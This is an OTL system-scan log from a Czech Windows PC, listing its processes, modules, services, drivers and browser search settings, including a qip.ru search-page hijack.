Locale: 00000405 | Country: Česká republika | Language: CSY | Date Format: d.M.yyyy

4,00 Gb Total Physical Memory | 2,14 Gb Available Physical Memory | 53,53% Memory free
7,99 Gb Paging File | 4,61 Gb Available in Paging File | 57,73% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 55,89 Gb Total Space | 9,14 Gb Free Space | 16,35% Space Free | Partition Type: NTFS
Drive D: | 1863,01 Gb Total Space | 848,85 Gb Free Space | 45,56% Space Free | Partition Type: NTFS
Drive E: | 465,75 Gb Total Space | 23,48 Gb Free Space | 5,04% Space Free | Partition Type: NTFS
Drive F: | 74,52 Gb Total Space | 5,05 Gb Free Space | 6,77% Space Free | Partition Type: NTFS
Drive G: | 2,92 Gb Total Space | 0,00 Gb Free Space | 0,00% Space Free | Partition Type: UDF
Drive H: | 3,31 Gb Total Space | 0,00 Gb Free Space | 0,00% Space Free | Partition Type: UDF

Computer Name: LOBO-PC | User Name: Lobo | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 7 Days

========== Processes (SafeList) ==========

PRC - [2014.12.09 17:30:53 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Lobo\Desktop\OTL.exe
PRC - [2014.11.26 14:14:24 | 001,880,752 | ---- | M] (Adobe Systems, Inc.) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe
PRC - [2014.11.21 06:12:56 | 000,969,016 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
PRC - [2014.11.21 06:12:54 | 001,871,160 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
PRC - [2014.11.21 06:12:46 | 007,229,752 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
PRC - [2014.11.18 21:23:36 | 001,519,808 | ---- | M] (Valve Corporation) -- D:\Steam\bin\steamwebhelper.exe
PRC - [2014.11.18 21:23:34 | 001,940,160 | ---- | M] (Valve Corporation) -- D:\Steam\Steam.exe
PRC - [2014.11.11 00:49:31 | 000,275,568 | ---- | M] (Mozilla Corporation) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe
PRC - [2014.09.12 10:43:06 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014.08.13 11:21:08 | 003,596,752 | ---- | M] (Check Point Software Technologies Ltd.) -- C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe
PRC - [2014.08.13 11:19:52 | 000,137,352 | ---- | M] (Check Point Software Technologies Ltd.) -- C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe
PRC - [2014.08.13 10:16:12 | 000,096,272 | ---- | M] (Check Point Software Technologies, Ltd.) -- C:\Program Files (x86)\CheckPoint\ZoneAlarm\ZAPrivacyService.exe
PRC - [2014.08.08 09:34:04 | 022,734,160 | ---- | M] (Google) -- C:\Program Files (x86)\Google\Drive\googledrivesync.exe
PRC - [2014.05.27 13:58:30 | 002,139,328 | ---- | M] (Comodo Security Solutions, Inc.) -- C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe
PRC - [2014.01.23 10:03:10 | 001,335,344 | ---- | M] (pdfforge GmbH) -- C:\Program Files (x86)\PDF Architect\HelperService.exe
PRC - [2014.01.23 10:03:06 | 000,856,112 | ---- | M] (pdfforge GmbH) -- C:\Program Files (x86)\PDF Architect\ConversionService.exe
PRC - [2013.12.17 11:38:33 | 005,341,536 | ---- | M] (TeamViewer GmbH) -- C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
PRC - [2013.10.08 06:46:47 | 000,175,016 | ---- | M] (Oracle Corporation) -- C:\Program Files (x86)\Java\jre7\bin\javaw.exe
PRC - [2013.07.02 08:16:32 | 000,507,264 | ---- | M] (Oracle Corporation) -- C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
PRC - [2013.03.21 14:19:46 | 001,341,664 | ---- | M] (ESET) -- C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe
PRC - [2013.03.15 06:53:06 | 001,266,464 | ---- | M] (NVIDIA Corporation) -- C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
PRC - [2013.03.14 21:07:46 | 000,383,264 | ---- | M] (NVIDIA Corporation) -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
PRC - [2011.03.04 12:45:08 | 001,529,856 | ---- | M] (Cisco Systems, Inc.) -- C:\Program Files (x86)\Cisco Systems\VPN Client\cvpnd.exe
PRC - [2009.08.24 13:38:06 | 000,068,136 | ---- | M] () -- C:\Program Files (x86)\Gigabyte\EasySaver\essvr.exe
PRC - [2009.07.14 02:14:47 | 000,164,864 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Windows Media Player\wmplayer.exe
PRC - [2009.01.12 13:15:52 | 000,071,096 | ---- | M] () -- C:\Program Files (x86)\Blaze Media Pro\NMSAccess32.exe
PRC - [2007.07.18 01:58:22 | 000,229,446 | ---- | M] (Invensys Systems, Inc.) -- C:\Program Files (x86)\Common Files\ArchestrA\aaLogger.exe
PRC - [2005.05.05 00:43:04 | 000,040,960 | ---- | M] (Invensys Systems, Inc.) -- C:\Program Files (x86)\Common Files\ArchestrA\slssvc.exe
PRC - [2005.01.12 19:37:28 | 000,032,845 | ---- | M] (Wonderware Corporation) -- C:\Program Files (x86)\Common Files\ArchestrA\NTServApp.exe


========== Modules (No Company Name) ==========

MOD - [2014.12.09 13:42:02 | 000,027,136 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\_multiprocessing.pyd
MOD - [2014.12.09 13:42:02 | 000,007,168 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\hashobjs_ext.pyd
MOD - [2014.12.09 13:42:01 | 001,160,704 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\_ssl.pyd
MOD - [2014.12.09 13:42:01 | 001,062,400 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\wx._controls_.pyd
MOD - [2014.12.09 13:42:01 | 000,811,008 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\wx._windows_.pyd
MOD - [2014.12.09 13:42:01 | 000,805,888 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\wx._gdi_.pyd
MOD - [2014.12.09 13:42:01 | 000,713,216 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\_hashlib.pyd
MOD - [2014.12.09 13:42:01 | 000,686,080 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\unicodedata.pyd
MOD - [2014.12.09 13:42:01 | 000,110,080 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\PyWinTypes27.dll
MOD - [2014.12.09 13:42:01 | 000,070,656 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\wx._html2.pyd
MOD - [2014.12.09 13:42:01 | 000,038,912 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32inet.pyd
MOD - [2014.12.09 13:42:01 | 000,025,600 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32pdh.pyd
MOD - [2014.12.09 13:42:01 | 000,024,064 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32pipe.pyd
MOD - [2014.12.09 13:42:01 | 000,018,432 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32event.pyd
MOD - [2014.12.09 13:42:01 | 000,010,240 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\select.pyd
MOD - [2014.12.09 13:42:00 | 001,175,040 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\wx._core_.pyd
MOD - [2014.12.09 13:42:00 | 000,557,056 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\pysqlite2._sqlite.pyd
MOD - [2014.12.09 13:42:00 | 000,525,640 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\windows._lib_cacheinvalidation.pyd
MOD - [2014.12.09 13:42:00 | 000,364,544 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\pythoncom27.dll
MOD - [2014.12.09 13:42:00 | 000,320,512 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32com.shell.shell.pyd
MOD - [2014.12.09 13:42:00 | 000,167,936 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32gui.pyd
MOD - [2014.12.09 13:42:00 | 000,128,512 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\_elementtree.pyd
MOD - [2014.12.09 13:42:00 | 000,127,488 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\pyexpat.pyd
MOD - [2014.12.09 13:42:00 | 000,119,808 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32file.pyd
MOD - [2014.12.09 13:42:00 | 000,108,544 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32security.pyd
MOD - [2014.12.09 13:42:00 | 000,098,816 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32api.pyd
MOD - [2014.12.09 13:42:00 | 000,087,552 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\_ctypes.pyd
MOD - [2014.12.09 13:42:00 | 000,078,336 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\wx._animate.pyd
MOD - [2014.12.09 13:42:00 | 000,045,568 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\_socket.pyd
MOD - [2014.12.09 13:42:00 | 000,022,528 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32ts.pyd
MOD - [2014.12.09 13:42:00 | 000,017,408 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32profile.pyd
MOD - [2014.12.09 13:41:59 | 000,735,232 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\wx._misc_.pyd
MOD - [2014.12.09 13:41:59 | 000,122,368 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\wx._wizard.pyd
MOD - [2014.12.09 13:41:59 | 000,035,840 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32process.pyd
MOD - [2014.12.09 13:41:59 | 000,011,264 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32crypt.pyd
MOD - [2014.11.26 14:14:23 | 016,841,392 | ---- | M] () -- C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll
MOD - [2014.11.18 21:23:50 | 002,227,904 | ---- | M] () -- D:\Steam\video.dll
MOD - [2014.11.18 21:23:34 | 000,690,880 | ---- | M] () -- D:\Steam\bin\chromehtml.dll
MOD - [2014.11.11 19:48:12 | 001,171,456 | ---- | M] () -- D:\Steam\libavcodec-56.dll
MOD - [2014.11.11 19:48:12 | 000,485,888 | ---- | M] () -- D:\Steam\libswscale-3.dll
MOD - [2014.11.11 19:48:12 | 000,442,368 | ---- | M] () -- D:\Steam\libavutil-54.dll
MOD - [2014.11.11 19:48:12 | 000,403,968 | ---- | M] () -- D:\Steam\libavformat-56.dll
MOD - [2014.11.11 19:48:12 | 000,332,800 | ---- | M] () -- D:\Steam\libavresample-2.dll
MOD - [2014.11.11 19:48:04 | 034,589,888 | ---- | M] () -- D:\Steam\bin\libcef.dll
MOD - [2014.11.11 19:48:02 | 000,837,824 | ---- | M] () -- D:\Steam\bin\ffmpegsumo.dll
MOD - [2014.11.11 19:47:56 | 000,774,656 | ---- | M] () -- D:\Steam\SDL2.dll
MOD - [2014.11.11 00:49:30 | 003,649,648 | ---- | M] () -- C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
MOD - [2013.03.07 19:00:00 | 003,501,056 | ---- | M] () -- C:\Program Files (x86)\K-Lite Codec Pack\Filters\ffdshow\ffdshow.ax
MOD - [2013.02.10 19:52:48 | 007,834,946 | ---- | M] () -- C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV\avcodec-lav-54.dll
MOD - [2013.02.10 19:52:48 | 001,251,150 | ---- | M] () -- C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV\avformat-lav-54.dll
MOD - [2013.02.10 19:52:48 | 000,379,254 | ---- | M] () -- C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV\swscale-lav-2.dll
MOD - [2013.02.10 19:52:48 | 000,242,190 | ---- | M] () -- C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV\avutil-lav-52.dll
MOD - [2013.02.10 19:52:48 | 000,164,666 | ---- | M] () -- C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV\avfilter-lav-3.dll
MOD - [2013.02.10 19:52:48 | 000,159,427 | ---- | M] () -- C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV\avresample-lav-1.dll
MOD - [2007.02.26 21:13:34 | 006,963,712 | ---- | M] () -- C:\Program Files (x86)\Blaze Media Pro\DVD Ripper\videotrans.dll
MOD - [2007.02.26 21:13:34 | 000,452,608 | ---- | M] () -- C:\Program Files (x86)\Blaze Media Pro\DVD Ripper\videoformat.dll
MOD - [2007.02.26 21:13:32 | 000,019,456 | ---- | M] () -- C:\Program Files (x86)\Blaze Media Pro\DVD Ripper\videocore.dll


========== Services (SafeList) ==========

SRV:64bit: - [2013.03.21 14:19:46 | 001,341,664 | ---- | M] (ESET) [Auto | Running] -- C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe -- (ekrn)
SRV:64bit: - [2009.07.14 02:41:27 | 001,011,712 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2009.07.14 02:40:01 | 000,193,536 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appmgmts.dll -- (AppMgmt)
SRV:64bit: - [2007.11.07 09:11:22 | 004,466,688 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\Remote Debugger\x64\msvsmon.exe -- (msvsmon90)
SRV - [2014.11.26 14:14:25 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014.11.21 06:12:56 | 000,969,016 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe -- (MBAMService)
SRV - [2014.11.21 06:12:54 | 001,871,160 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe -- (MBAMScheduler)
SRV - [2014.11.11 00:49:30 | 000,114,288 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014.10.21 20:22:40 | 000,833,728 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014.09.12 10:43:06 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014.08.13 11:21:08 | 003,596,752 | ---- | M] (Check Point Software Technologies Ltd.) [Auto | Running] -- C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe -- (vsmon)
SRV - [2014.08.13 10:16:12 | 000,096,272 | ---- | M] (Check Point Software Technologies, Ltd.) [Auto | Running] -- C:\Program Files (x86)\CheckPoint\ZoneAlarm\ZAPrivacyService.exe -- (ZAPrivacyService)
SRV - [2014.05.27 13:58:30 | 002,139,328 | ---- | M] (Comodo Security Solutions, Inc.) [Auto | Running] -- C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe -- (DragonUpdater)
SRV - [2014.04.03 19:21:48 | 000,315,008 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2014.01.23 10:03:10 | 001,335,344 | ---- | M] (pdfforge GmbH) [Auto | Running] -- C:\Program Files (x86)\PDF Architect\HelperService.exe -- (PDF Architect Helper Service)
SRV - [2014.01.23 10:03:06 | 000,856,112 | ---- | M] (pdfforge GmbH) [Auto | Running] -- C:\Program Files (x86)\PDF Architect\ConversionService.exe -- (PDF Architect Service)
SRV - [2013.12.17 11:38:33 | 005,341,536 | ---- | M] (TeamViewer GmbH) [Auto | Running] -- C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe -- (TeamViewer9)
SRV - [2013.03.15 06:53:06 | 001,266,464 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe -- (nvUpdatusService)
SRV - [2013.03.14 21:07:46 | 000,383,264 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe -- (Stereo Service)
SRV - [2012.07.09 00:40:10 | 000,104,912 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2011.03.04 12:45:08 | 001,529,856 | ---- | M] (Cisco Systems, Inc.) [Auto | Running] -- C:\Program Files (x86)\Cisco Systems\VPN Client\cvpnd.exe -- (CVPND)
SRV - [2009.08.24 13:38:06 | 000,068,136 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\Gigabyte\EasySaver\essvr.exe -- (ES lite Service)
SRV - [2009.06.10 22:23:09 | 000,066,384 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2009.01.12 13:15:52 | 000,071,096 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\Blaze Media Pro\NMSAccess32.exe -- (NMSAccess)
SRV - [2007.07.18 03:42:58 | 000,080,688 | ---- | M] (Invensys Systems, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\ArchestrA\wwnetdde.exe -- (WWNetDDE)
SRV - [2007.07.18 01:58:22 | 000,229,446 | ---- | M] (Invensys Systems, Inc.) [Auto | Running] -- C:\Program Files (x86)\Common Files\ArchestrA\aaLogger.exe -- (aaLogger)
SRV - [2005.05.05 00:43:04 | 000,040,960 | ---- | M] (Invensys Systems, Inc.) [Auto | Running] -- C:\Program Files (x86)\Common Files\ArchestrA\slssvc.exe -- (slssvc)
SRV - [2005.01.12 19:37:28 | 000,032,845 | ---- | M] (Wonderware Corporation) [Auto | Running] -- C:\Program Files (x86)\Common Files\ArchestrA\NTServApp.exe -- (FS Service Control)


========== Driver Services (SafeList) ==========

DRV:64bit: - [2014.12.09 17:05:59 | 000,129,752 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys -- (MBAMSwissArmy)
DRV:64bit: - [2014.11.21 06:14:22 | 000,063,704 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\mwac.sys -- (MBAMWebAccessControl)
DRV:64bit: - [2014.11.21 06:14:08 | 000,025,816 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\mbam.sys -- (MBAMProtector)
DRV:64bit: - [2014.08.13 10:16:02 | 000,450,456 | ---- | M] (Check Point Software Technologies Ltd.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\vsdatant.sys -- (Vsdatant)
DRV:64bit: - [2014.06.11 10:09:28 | 000,490,592 | ---- | M] (Kaspersky Lab ZAO) [File_System | System | Running] -- C:\Windows\SysNative\drivers\klif.sys -- (KLIF)
DRV:64bit: - [2014.06.11 10:09:26 | 007,717,984 | ---- | M] (Kaspersky Lab ZAO) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\kl1.sys -- (KL1)
DRV:64bit: - [2013.04.26 10:03:49 | 000,283,200 | ---- | M] (DT Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV:64bit: - [2013.02.14 12:21:06 | 000,058,416 | ---- | M] (ESET) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\epfwwfp.sys -- (epfwwfp)
DRV:64bit: - [2013.02.14 12:21:04 | 000,213,416 | ---- | M] (ESET) [File_System | System | Running] -- C:\Windows\SysNative\drivers\eamonm.sys -- (eamonm)
DRV:64bit: - [2013.01.10 09:25:22 | 000,190,232 | ---- | M] (ESET) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\epfw.sys -- (epfw)
DRV:64bit: - [2013.01.10 09:25:22 | 000,059,440 | ---- | M] (ESET) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\EpfwLWF.sys -- (EpfwLWF)
DRV:64bit: - [2013.01.10 09:25:20 | 000,150,616 | ---- | M] (ESET) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ehdrv.sys -- (ehdrv)
DRV:64bit: - [2012.12.19 06:41:52 | 000,194,488 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nvhda64v.sys -- (NVHDA)
DRV:64bit: - [2011.03.04 12:51:50 | 000,306,536 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\CVPNDRVA.sys -- (CVPNDRVA)
DRV:64bit: - [2010.03.22 10:57:20 | 000,347,680 | ---- | M] (Realtek ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2010.02.08 08:32:00 | 000,014,992 | ---- | M] (Cisco Systems, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\CVirtA64.sys -- (CVirtA)
DRV:64bit: - [2009.07.14 02:52:21 | 000,106,576 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2009.07.14 02:52:21 | 000,028,752 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2009.07.14 02:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009.07.14 02:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009.07.14 02:47:48 | 000,077,888 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2009.07.14 02:47:48 | 000,023,104 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2009.07.14 02:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009.06.10 21:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009.06.10 21:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009.06.10 21:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009.06.10 21:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2008.11.16 18:39:44 | 000,157,968 | ---- | M] (Deterministic Networks, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\dne64x.sys -- (DNE)
DRV - [2014.12.09 13:41:34 | 000,025,640 | ---- | M] (Windows (R) Server 2003 DDK provider) [Kernel | On_Demand | Running] -- C:\Windows\gdrv.sys -- (gdrv)
DRV - [2013.04.19 14:29:14 | 000,030,528 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\GVTDrv64.sys -- (GVTDrv64)
DRV - [2012.08.01 14:44:04 | 000,014,544 | ---- | M] (OpenLibSys.org) [File_System | On_Demand | Stopped] -- C:\Program Files (x86)\Razer\Razer Game Booster\Driver\WinRing0x64.sys -- (WinRing0_1_2_0)
DRV - [2009.07.14 02:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)


========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========

IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {A55F9C95-2BB1-4EA2-BC77-DFAAB78832CE}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC


IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0



IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://qip.ru
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.qip.ru
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://search.qip.ru/ie
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://search.qip.ru
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://qip.ru [binary data]
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://search.zonealarm.com/?src=hp&tbi ... tsId=&ver=&
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://search.qip.ru/ie
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\..\URLSearchHook: - No CLSID value found
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\..\URLSearchHook: {95289393-33EA-4F8D-B952-483415B9C955} - C:\Users\Lobo\AppData\Roaming\Microsoft\Internet Explorer\qipsearchbar.dll (qip.ru)
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\..\SearchScopes,DefaultScope = {A55F9C95-2BB1-4EA2-BC77-DFAAB78832CE}
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTer ... ORM=IE8SRC
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\..\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}: "URL" = http://mysearch.avg.com/search?cid={6D8 ... 2014-05-19 20:03:06&v=18.1.0.443&pid=safeguard&sg=&sap=dsp&q={searchTerms}
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\..\SearchScopes\{A55F9C95-2BB1-4EA2-BC77-DFAAB78832CE}: "URL" = http://search.qip.ru/search?query={searchTerms}&from=IE
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\..\SearchScopes\{C77A57D4-8635-4AC8-A0B6-E1E68E413141}: "URL" = http://search.zonealarm.com/search?src= ... er=&&r=611
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0


========== FireFox ==========

FF - prefs.js..browser.search.defaultenginename: "QIP Search"
